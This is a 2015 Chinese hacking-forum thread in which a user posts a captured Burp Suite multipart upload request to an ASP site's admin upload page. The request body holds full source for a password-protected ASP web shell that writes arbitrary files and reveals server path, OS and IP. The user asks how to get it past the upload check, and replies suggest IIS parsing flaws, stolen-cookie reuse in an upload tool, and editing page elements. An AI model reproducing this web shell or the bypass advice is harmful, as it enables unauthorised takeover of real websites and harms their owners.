burpsuite上传遇到问题求助

旧旧 · 发表于 2015-11-1 17:58:30

本帖最后由旧旧于 2015-11-1 18:00 编辑

用burp抓的包，但是filename=“”这边有点乱码了，不知道怎么办
还有一个问题就是这个数据包怎么修改才能正常上传

POST /admin/upfile_yqhy.asp HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.       com/admin/picture_ymqy.asp
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Content-Type: multipart/form-data; boundary=---------------------------7df30d10101ae
Accept-Encoding: gzip, deflate
Host: www. com
Content-Length: 1520
Pragma: no-cache
Cookie: zh_choose=n; ASPSESSIONIDCQBARSQC=OEDBJOMCIIPMOJNCADCONEKP

-----------------------------7df30d10101ae
Content-Disposition: form-data; name="file1"; filename="E:\1¤??°üò?\??±????í\?￡??′ó?à￡¨asp ??±?￡?\[ó?á|2???è￥]aspD??í\3.jpg"
Content-Type: text/plain

<%
on error resume next
%>
<%
  if request("pass")="g" then  '?ú?aDT???ü??
  session("pw")="go"
  end if
%>
<%if session("pw")<>"go" then %>
<%="<center><br><form action='' method='post'>"%>
<%="<input name='pass' type='password' size='10'> <input "%><%="type='submit' value='ó?á|2???è￥'></center>"%>
<%else%>
<%
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
%>
<%="yes"%>
<%else%>
<%="no"%>
<%
end if
err.clear
end if
da.close
%>
<%set da=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%="μ±?°???t?·??:"&server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%="2ù×÷?μí3?a:"&Request.ServerVariables("OS")%>
<%="<br>"%>
<%="WEB·t???÷°?±??a:"&Request.ServerVariables("SERVER_SOFTWARE")%>
<%="<br>"%>
<%="·t???÷μ?IP?a:"&Request.ServerVariables("LOCAL_ADDR")%>
<%="<br>"%>
<%=""%>
<%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<%end if%>
-----------------------------7df30d10101ae
Content-Disposition: form-data; name="B1"

é?′?
-----------------------------7df30d10101ae--

蓝颜 · 发表于 2015-11-1 19:22:37

3.jpg这个格式你怎么能拿。解析漏洞试试

蓝颜 · 发表于 2015-11-1 19:22:45

3.jpg这个格式你怎么能拿。解析漏洞试试

旧旧 · 发表于 2015-11-1 19:37:06

蓝颜发表于 2015-11-1 19:22
3.jpg这个格式你怎么能拿。解析漏洞试试

3.gpg是没法解析,但是再把其中的代码一截代码再粘帖复制一次，利用了明小子那个综合上传的原理，但是我不知道怎么修改不知道在哪里粘帖复制

90_ · 发表于 2015-11-1 23:08:35

路径可能是中文才乱码

LiFi · 发表于 2015-11-2 19:57:58

旧旧发表于 2015-11-1 19:37
3.gpg是没法解析,但是再把其中的代码一截代码再粘帖复制一次，利用了明小子那个综合上传的原理，但是我不 ...

，用抓包工具，抓到上传文件时的cookie，，复制，粘贴在明小子放cookie的地方，之后找到相应的上传格式，上传就可以了，你也可以审查元素来修改元素来上传，本地构造试试也可以。个人自认为可行的办法，

旧旧 · 发表于 2015-11-2 21:26:49

LiFi 发表于 2015-11-2 19:57
，用抓包工具，抓到上传文件时的cookie，，复制，粘贴在明小子放cookie的地方，之后找到相应的上传格式， ...

明小子上传不行，上传不了

旧旧 · 发表于 2015-11-2 22:03:53

90_ 发表于 2015-11-1 23:08
路径可能是中文才乱码

那路径是中文这样上传能被解析吗

Mrlin · 发表于 2015-11-17 12:24:58

提示: 作者被禁止或删除内容自动屏蔽

burpsuite上传遇到问题求助

点评

点评

点评

点评

指导单位

旗下站点

联系我们